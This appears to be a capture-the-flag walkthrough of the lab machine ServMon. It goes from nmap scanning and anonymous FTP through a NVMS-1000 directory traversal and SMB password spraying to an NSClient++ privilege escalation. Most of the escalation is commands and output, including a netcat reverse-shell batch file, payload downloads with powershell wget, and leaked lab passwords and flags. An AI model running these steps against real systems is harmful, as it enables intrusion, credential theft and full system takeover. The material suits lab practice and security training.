ServMon

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.184 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed Mar 23 21:32:07 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.184
Warning: 10.10.10.184 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.184
Host is up (0.058s latency).
Not shown: 65510 closed tcp ports (reset)
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
80/tcp    open     http
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
5666/tcp  open     nrpe
6063/tcp  open     x11
6699/tcp  open     napster
8443/tcp  open     https-alt
14116/tcp filtered unknown
23890/tcp filtered unknown
25426/tcp filtered unknown
29627/tcp filtered unknown
36396/tcp filtered unknown
44382/tcp filtered unknown
49664/tcp open     unknown
49665/tcp open     unknown
49666/tcp open     unknown
49667/tcp open     unknown
49668/tcp open     unknown
49669/tcp open     unknown
49670/tcp open     unknown
54265/tcp filtered unknown
57900/tcp filtered unknown

# Nmap done at Wed Mar 23 21:32:25 2022 -- 1 IP address (1 host up) scanned in 18.16 seconds

As we see, there are a lot of ports open. Let's try to obtain more information about the service and version running on those ports. The following command will scan the previous ports more in depth and save the result into a file:

nmap -sC -sV -p21,22,80,135,139,445,5666,6063,6699,8443,14116,23890,25426,29627,36396,44382,49664,49665,49666,49667,49668,49669,49670,54265,57900 10.10.10.184 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Mar 23 21:38:28 2022 as: nmap -sCV -p21,22,80,135,139,445,5666,6063,6699,8443,14116,23890,25426,29627,36396,44382,49664,49665,49666,49667,49668,49669,49670,54265,57900 -oN targeted 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up (0.056s latency).

PORT      STATE  SERVICE       VERSION
21/tcp    open   ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  07:35PM       <DIR>          Users
22/tcp    open   ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
|   256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_  256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp    open   http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?
5666/tcp  open   tcpwrapped
6063/tcp  open   tcpwrapped
6699/tcp  open   napster?
8443/tcp  open   ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
| http-title: NSClient++
|_Requested resource was /index.html
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|     :Saturday
|     workers
|_    jobs
14116/tcp closed unknown
23890/tcp closed unknown
25426/tcp closed unknown
29627/tcp closed unknown
36396/tcp closed unknown
44382/tcp closed unknown
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   msrpc         Microsoft Windows RPC
54265/tcp closed unknown
57900/tcp closed unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.92%I=7%D=3/23%Time=623B854A%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.92%T=SSL%I=7%D=3/23%Time=623B8553%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0\0\0\0:Saturday\0\0\
SF:x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x18G\x12\x0f")%
SF:r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocu
SF:ment\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nCont
SF:ent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"H
SF:TTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20foun
SF:d")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nD
SF:ocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-23T20:40:26
|_  start_date: N/A
|_clock-skew: 1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 23 21:40:38 2022 -- 1 IP address (1 host up) scanned in 129.73 seconds

Nmap reported that anonymous login is accepted on the FTP server, let's see what's inside.

ftp 10.10.10.184

Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:alfa8sa): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49677|)
125 Data connection already open; Transfer starting.
02-28-22  07:35PM       <DIR>          Users
226 Transfer complete.

Let's go to the Users directory.

ftp> cd Users

250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49679|)
125 Data connection already open; Transfer starting.
02-28-22  07:36PM       <DIR>          Nadine
02-28-22  07:37PM       <DIR>          Nathan
226 Transfer complete.

If we take a look at the Nadine folder, we'll see the Confidential.txt file, let's transfer it to our local machine.

ftp> cd Nadine

250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49681|)
125 Data connection already open; Transfer starting.
02-28-22  07:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49683|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************************|   168       19.08 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (18.27 KiB/s)

On the other hand, if we take a look at the Nathan directory, we'll see the Notes to do.txt file, let's also transfer it to our current machine.

ftp> cd Nathan

ftp> ls
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
02-28-22  07:36PM                  182 Notes to do.txt
226 Transfer complete.
ftp> get Notes\ to\ do.txt
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||49689|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************************|   182        5.00 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (4.97 KiB/s)

If we take a look at the Confidential.txt file, we'll see a message from Nadine to Nathan saying that there is a file in C:\Users\Nathan\Desktop\Passwords.txt which contains passwords.

cat Confidential.txt

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

And if we take a look at the Notes to do.txt file, we'll see a to-do list, which says that the passwords file hasn't been removed yet.

cat Notes\ to\ do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Now that we have some valid users, let's put them in a file.

nano users

nadine
nathan

Exploitation

Let's take a look at the website.

It is a NVMS-1000 login page. Let's search for commons exploits associated to that service.

searchsploit nvms

------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                         |  Path
------------------------------------------------------------------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal                                                                        | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification                                       | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow                                                     | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal                                                                    | hardware/webapps/48311.py
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

If we take a look at the first one, we'll see that we can list files of the machine with a directory path traversal.

searchsploit -x hardware/webapps/47774.txt

-x examine the exploit.

# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan T<C3><BC>rle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

We could try to list the content of the Passwords.txt file on the nathan user desktop. Let's open BurpSuite, intercept a request, send it to the repeater, and make a GET request to the following URL.

Now that we have a list of passwords, let's put them in a file.

nano passwds

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Now, we could try to log in to the SMB server with each password of the passwds file with each user of the users file.

crackmapexec smb 10.10.10.184 -u users -p passwds --continue-on-success

-u users file.
-p passwords file.
---continue-on-success continues authentication attempts even after successes.

SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [+] ServMon\nadine:L1k3B1gBut7s@W0rk 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nadine:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nadine:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nadine:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
SMB         10.10.10.184    445    SERVMON          [-] ServMon\nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE

And we see that the user nadine has the L1k3B1gBut7s@W0rk password. Let's get into the machine via SSH. Then we could grab the user flag.

sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@10.10.10.184

Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>type \Users\Nadine\Desktop\user.txt
fa152741e44607fef552f6d3a22c91cf

Privilege Escalation

If we take a look at the nmap report, we'll see that port 8443 is open, let's take a look at it.

If we search for common exploits of nsclient, we'll see there is one for privilege escalation.

searchsploit nsclient

------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                         |  Path
------------------------------------------------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution                                              | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation                                                             | windows/local/46802.txt
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Let's take a look at it.

searchsploit -x windows/local/46802.txt

-x examine the exploit.

Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password 
in cleartext from the configuration file.  From here a user is able to login to the web server and make changes to the configuration file
 that is normally restricted.

The user is able to enable the modules to check external scripts and schedule those scripts to run.  There doesn't seem to be restriction
s on where the scripts are called from, so the user can create the script anywhere.  Since the NSClient++ Service runs as Local System, t
hese scheduled scripts run as that user and the low privilege user can gain privilege escalation.  A reboot, as far as I can tell, is required to reload and read the changes to the web config.

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.

Let's go step by step doing what it says. First, we have to go to C:\Program Files\NSClient++ and take a look at the nsclient.ini file.

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
        C:\Program Files\NSClient++>nscp web -- password --display
        Current password: SoSecret

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini

; Undocumented key
password = ew2x6SsGTxjRwXOT

Next, we'll have to log in into the web page with the password we just got.

But we get rejected. If we take a look at the nsclient.ini file again, we'll see that the 127.0.0.1 is the only host allowed.

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini

; Undocumented key
allowed hosts = 127.0.0.1

We can use a tunnel with SSH, from our localhost on port 8443, to the ServMon machine on port 8443.

sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443

If now we go to https://localhost:8443, and log in with the password, we'll get in.

Next step, enable the CheckExternalScripts and Scheduler modules. If we go to the Modules section, we'll see that both are already enabled.

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

Next step, transfer nc.exe and evil.bat files to the victim machine.

3. Download nc.exe and evil.bat to c:\temp from attacking machine
        @echo off
        c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

The evil.bat file will send us a reverse shell when executed.

c:\temp\nc.exe 10.10.14.19 4444 -e cmd

Let's set an HTTP server with python on the directory where these files are.

python -m http.server 80

Now let's go to the root, create the temp directory, and go inside it.

cd \
mkdir temp
cd temp

Then download both binaries from our local machine.

powershell -c "wget http://10.10.14.19/evil.bat -outfile evil.bat"
powershell -c "wget http://10.10.14.19/nc.exe -outfile nc.exe"
dir

Volume in drive C has no label. 
 Volume Serial Number is 20C1-47A1

 Directory of C:\Temp

03/24/2022  02:12 AM    <DIR>          .
03/24/2022  02:12 AM    <DIR>          ..
03/24/2022  02:12 AM                53 evil.bat
03/24/2022  02:12 AM            28,160 nc.exe
               2 File(s)         28,213 bytes
               2 Dir(s)   6,095,523,840 bytes free

Next step, let's set a netcat listener on port 4444.

4. Setup listener on attacking machine
        nc -nlvvp 4444

rlwrap nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Next step, go to the Settings section, then External Scripts, then Scripts and create a new script with the following content.

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
        - foobar
                command = c:\temp\evil.bat

Then hit Add, and then go to Changes, and hit the Save configuration button.

And then click on Control, and Reload.

Once it finishes reloading, go to https://localhost:8443/index.html, and log in again with the password.

Then in the Queries section, we should see a query named like our script.

Click on it, go to the Run tab, and hit the Run button.

Then, we should get a reverse shell, and all we have to do is reap the harvest and take the root flag.

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.184] 49184
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
nt authority\system

C:\Program Files\NSClient++>type \users\administrator\desktop\root.txt
766d4cfbe441e8e51beea55bd8641337

Last updated 2 years ago

Was this helpful?